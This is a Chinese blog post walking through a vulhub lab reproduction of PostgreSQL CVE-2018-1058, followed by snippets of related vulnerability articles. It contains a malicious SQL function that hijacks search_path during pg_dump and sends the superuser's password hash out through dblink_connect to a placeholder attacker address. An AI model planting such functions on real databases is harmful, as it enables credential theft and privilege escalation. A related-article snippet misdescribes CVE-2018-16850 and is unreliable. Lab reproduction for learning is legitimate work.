【vulhub】PostGresql远程代码执行漏洞复现(CVE-2018-1058)

已于 2022-08-05 13:45:21 修改
阅读量1.1k 收藏
点赞数
分类专栏: Vulhub漏洞复现 文章标签: postgresql 数据库 web安全 sql
于 2022-08-05 12:15:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_51295677/article/details/125998232
版权

上一篇文章提到的知识就是为了此漏洞复现时对其攻击过程恶意构造有更好的理解。

该漏洞影响到的版本:PG < 10。

复现的大体流程是:以一个普通用户登录在public中写入一个恶意的函数,通过修改publicpg_catalog的先后调用顺序导致超级用户利用自己的高权限调用自以为是正常的恶意函数最后触发恶意内容。

漏洞复现

这里模拟出一个普通用户(账号:vulhub 密码:vulhub),登录进去。 

然后创建一个恶意函数array_to_string()

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=your_ip_address port=5432 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

这里解释一下上面的代码含义,第一行很简单,定义一个public模式下的函数,函数名与参数类型和个数都不能修改(保证与pg_catalog中的函数名相同),至于为什么要用这个函数,这里借用一个师傅文章的图片。

这个漏洞主要是pg_dump备份时会产生search_path的动态改变,这样则会导致一些本应该pg_catalog模式中的函数触发,一旦public中也存在就会触发public中的,上面这张图时pg_dump备份后bak文件中的数据,可以看到有个array_to_string()没有指定schema,至于他在相同模式中的定义为:

第二行用的dblink_connect()可以外带数据,类似于DNSLog注入时带出的数据(但原理不相同)。

第三行代码其实有和无没关系,主要是构造了一个恶意的函数,再在后面把正常的功能还原以便不影响到函数本身的功能而被超级用户发觉。

第四行结尾,固定格式。注意VOLATILE是一个状态,PG中有三个状态:IMMUTABLESTABLEVOLATILE(非常稳定、稳定、不稳定)。不稳定可以对数据库中的内容进行修改,其它的两个感兴趣的可以自己百度搜索了解。

最后我们测试一下:

设置完函数再对端口进行监听,最后进入docker环境模拟登录超级用户,对vulhub进行备份

最后监听到了一串MD5加密的密码 。

参考:PostgreSQL 远程代码执行漏洞分析及利用—【CVE-2018-1058】 - SecPulse.COM | 安全脉搏

漏洞复现】Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
李火火的安全圈
06-06 2385
本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
CVE-2023-25157:GeoServer OGC Filter SQL注入漏洞复现
薛定谔嘚喵博客
09-01 2385
由于系统未对用户输入进行过滤,远程未授权攻击者可以构造特定语句绕过GeoServer的词法解析,从而实现SQL注入,成功利用此漏洞可获取敏感信息,甚至可能获取数据库服务器权限。由于GeoServer在默认配置下内置图层存放数据在文件中,则未使用外置数据库的场景不受此漏洞影响。
PostgreSQL 提权漏洞CVE-2018-1058
玄道的网安博客
06-23 1536
前言 PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 漏洞环境 启动存在漏洞的环境: docker-compose up -d 环境启动后,将在本地开启PG默认的5432端口。 参考上述链接中的第二种利用方式,我们先通过普通用户vulhub:vulhub的身份登录postgres: psql --host your-ip --username vulhub 执行如下语句后退
CVE-2018-1058远程代码执行漏洞vulhub复现
qq_52279315的博客
05-17 401
vulhub靶场复现postgresql
数据库漏洞-postgresql利用复现
最新发布
lza20001103的博客
04-08 900
数据库漏洞-postgresql利用复现
PostgreSQL 提权漏洞复现(CVE-2018-1058)
又菜又爱倒腾的博客
10-29 3199
#PostgreSQL 提权漏洞(CVE-2018-1058)# 一、漏洞简介 PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 二、漏洞影响 影响版本 9.3到10 三、产生原因 PostgreSQL7.3版本之后,默认情况下,当一个用户创建一个数据库时,PostgreSQL会创建一个叫做public的模式。默认情况下,所有的对象都会被创建到这个模式下。所以SELECT * FROM a;
P6 利用Vulhub复现漏洞 -PostgreSQL 提权漏洞CVE-2018-1058
在下小黄的博客
05-08 1053
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P6 利用Vulhub复现漏洞 -PostgreSQL 提权漏洞CVE-2018-1058) 往期检索:程序设计学习笔记——目录 创建时间:2021年3月29日 软件: kali 2020.4 、Burp Suite Pro 、火狐浏览器 、Vulhub靶机 PostgreSQL 提权漏洞Vulhub 复现漏洞原理环境准备漏洞复现 Vulhub 复现 PostgreSQL 提权漏洞 漏洞原理 Po
PostgreSQL 高权限命令执行漏洞复现(CVE-2019-9193)
又菜又爱倒腾的博客
10-29 1987
#PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)# 一、漏洞简介 PostgreSQL是功能强大的数据库软件,可在所有主要操作系统上运行,包括Linux,Windows,Mac OS X等。所公开的漏洞存在于命令“COPY TO / FROM PROGRAM”中,用于导入和导出数据。在“pg_read_server_files”组中的用户执行上述命令之后,可以获得数据库超级用户权限,从而执行任何系统命令。 二、漏洞影响 影响版本 PostgreSQL 9.3-11.2 三、产生原因
漏洞复现PostgreSQL任意命令执行(CVE-2019-9193)
Blood_Pupil的博客
05-09 5742
PostgreSQL任意命令执行(CVE-2019-9193) PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下常用的数据库,但是同时也提供Windows和Linux操作系统版本 今天,我将要给大家介绍一个PostgreSQL的鲜为人知的特性,这个特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3至最新版本(11.2)...
Vulhub靶场
blalaa的博客
09-05 1856
【Django JSONField/HStoreField SQL 注入漏洞 】 ①原理 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 在Django中支持Postgresql的数据类型:JSONField、HStoreField、Arr
vulhub复现记录
书山有路勤为径,学海无涯苦作舟
10-16 1988
看作者下面的解释可以知道,自 2022 年 2 月起,作为 Docker Compose V2023 的子命令合并到 Docker 中,Python 版本的将在 年 月之后弃用。但是由于我之前在CentOS搭建了老的docker,所以就继续使用,老的docker-compose.其中遇到不少坑,就浅浅的记录一下吧。
CVE-2018-1058 PostgreSQL 提权漏洞
技术超强的网络安全平台
08-01 340
漏洞原理。
PostgreSQL 提权漏洞 CVE-2018-1058 漏洞复现
ADummy的博客
03-07 779
PostgreSQL 提权漏洞CVE-2018-1058) by ADummy 0x00利用路线 ​ 普通用户连接到数据库—>注入危险代码—>等待超级用户登录触发后门—>收到敏感信息 0x01漏洞介绍 ​ PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 影响版本 PostgreSQL < 10 0x02漏洞复现 我们先通过普通用户vulhub:vulhub
PostgreSQL 任意命令执行漏洞(CVE-2019-9193)
信息安全
10-03 1181
记一次授权攻击通过PostgreSql弱口令拿到服务器权限的事件。使用靶机复现攻击过程。
postgresql 远程用户_PostgreSQL 辟谣存在任意代码执行漏洞:消息不实
weixin_39866963的博客
11-27 147
近期在互联网媒体上流传 PostgreSQL 存在任意代码执行漏洞:拥有‘pg_read_server_files’权限的攻击者可利用此漏洞获取超级用户权限,执行任意系统命令。针对此言论,PostgreSQL 官方在2019年4月4日发表声明如下:互联网媒体上报导的有关 PostgreSQL 方面的安全漏洞 CVE-2019-9193,PostgreSQL 安全团队强调这不是一个安全漏洞, 我们...
CVE-2019-9193 PostgreSQL 高权限命令执行漏洞
qq_51979295的博客
10-08 1109
康复训练
CVE-2018-1058简介
HighGO
04-04 1403
CVE-2018-1058描述了一个用户在不同模式下创建的一些名字很像的对象,是怎么改变其他用户的查询行为而且导致意料之外或者有害的行为的。它主要描述了这个问题以及在PostgreSQL中减轻这些问题的影响的办法。 什么是CVE-2018-1058PostgreSQL7.3版本之后,默认情况下,当一个用户创建一个数据库时,PostgreSQL会创建一个叫做public的模式。默认情况下,所...
PostgreSQL高权限命令执行(CVE-2019-9193)漏洞复现&实战
jihaichen的博客
04-26 3140
一、漏洞利用 这个漏洞是一个版本漏洞 从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作 系统命令,利用的前提 1、需要登录2、需要高权限 所以要先弱口令爆破之后,然后查看是否是高权限。 这里之所以选择复现这个漏洞,因为其中的思路比较有意思,也就是看回显的思路。 先大体讲一下这个漏洞是怎么看回显的,他是通过命令执行然后把回显写入创建的一张表里面,下面来具体操作。 先删除你
PostgreSQL SQL注入漏洞(CVE-2018-16850)
02-14
### PostgreSQL CVE-2018-16850 SQL 注入漏洞详情与解决方案 #### 漏洞描述 CVE-2018-16850 是一个存在于 PostgreSQL 的扩展 `plperl` 中的安全漏洞。该漏洞允许攻击者通过精心构造的输入,在启用了 PL/Perl 扩展的情况下执行任意代码,从而实现远程命令执行或数据泄露。 此漏洞的根本原因在于 `plperl` 处理某些特殊字符的方式不当,使得恶意用户能够绕过预期的安全检查并注入恶意 Perl 代码[^1]。 #### 影响版本 受影响的 PostgreSQL 版本包括但不限于: - PostgreSQL 9.4.x 到 9.4.23 - PostgreSQL 9.5.x 到 9.5.17 - PostgreSQL 9.6.x 到 9.6.13 - PostgreSQL 10.x 到 10.8 #### 解决方案 为了防止利用此漏洞,建议采取以下措施之一来修复系统: 1. **升级到安全版本**:最直接的方法是将 PostgreSQL 升级至不受影响的新版本。官方已经发布了针对不同分支的安全更新包。 2. **禁用 PL/Perl 扩展**:如果应用程序不需要使用 PL/Perl 功能,则可以选择完全移除或禁用这个扩展模块。这可以通过运行如下 SQL 命令完成: ```sql DROP EXTENSION IF EXISTS plperl; ``` 3. **应用补丁程序**:对于无法立即进行全面升级的情况,可以单独安装由供应商提供的针对性补丁文件。 4. **加强权限管理**:即使存在潜在风险点,合理配置数据库用户的最小化权限原则也能有效降低被成功攻击的概率。确保只有可信账户才拥有创建或修改函数的权利[^2]。 ```python import psycopg2 def check_plperl_extension(): conn = None try: conn = psycopg2.connect("dbname=test user=postgres password=secret") cur = conn.cursor() cur.execute(""" SELECT extname FROM pg_extension WHERE extname='plperl'; """) result = cur.fetchone() if result: print(f"PL/Perl extension is enabled.") else: print(f"PL/Perl extension is not found.") except Exception as e: print(e) finally: if conn is not None: conn.close() check_plperl_extension() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

errorr0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值